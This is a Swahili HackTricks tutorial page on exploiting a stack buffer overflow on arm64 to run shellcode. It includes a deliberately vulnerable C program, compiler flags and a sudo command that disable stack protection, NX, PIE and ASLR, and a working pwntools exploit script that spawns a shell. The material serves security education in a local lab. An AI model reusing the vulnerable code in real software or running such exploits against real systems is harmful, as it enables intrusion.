3.1 KiB
Msimbo wa Shellcode ya Stack - arm64
Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!
Njia nyingine za kusaidia HackTricks:
- Ikiwa unataka kuona kampuni yako ikitangazwa kwenye HackTricks au kupakua HackTricks kwa PDF Angalia MIPANGO YA USAJILI!
- Pata bidhaa rasmi za PEASS & HackTricks
- Gundua Familia ya PEASS, mkusanyiko wetu wa NFTs ya kipekee
- Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Pata utangulizi wa arm64 katika:
{% content-ref url="../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md" %} arm64-basic-assembly.md {% endcontent-ref %}
Msimbo
#include <stdio.h>
#include <unistd.h>
void vulnerable_function() {
char buffer[64];
read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability
}
int main() {
vulnerable_function();
return 0;
}
Kusanya bila pie, kifaru na nx:
{% code overflow="wrap" %}
clang -o bof bof.c -fno-stack-protector -Wno-format-security -no-pie -z execstack
Hakuna ASLR & Hakuna kengele - Kujaza Kumbukumbu
Ili kusitisha ASLR tekeleza:
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
Ili kupata offset ya bof tazama kiungo hiki.
Tumia:
from pwn import *
# Load the binary
binary_name = './bof'
elf = context.binary = ELF(binary_name)
# Generate shellcode
shellcode = asm(shellcraft.sh())
# Start the process
p = process(binary_name)
# Offset to return address
offset = 72
# Address in the stack after the return address
ret_address = p64(0xfffffffff1a0)
# Craft the payload
payload = b'A' * offset + ret_address + shellcode
print("Payload length: "+ str(len(payload)))
# Send the payload
p.send(payload)
# Drop to an interactive session
p.interactive()
Kitu pekee "cha kuf complicated" kupata hapa ni anwani kwenye stack ya kuita. Kwenye kesi yangu nilizalisha exploit na anwani niliyoipata kwa kutumia gdb, lakini kisha nilipokuwa nikiiharibu haikufanya kazi (kwa sababu anwani ya stack ilibadilika kidogo).
Nilifungua faili ya core iliyozalishwa (gdb ./bog ./core) na nikachunguza anwani halisi ya mwanzo wa shellcode.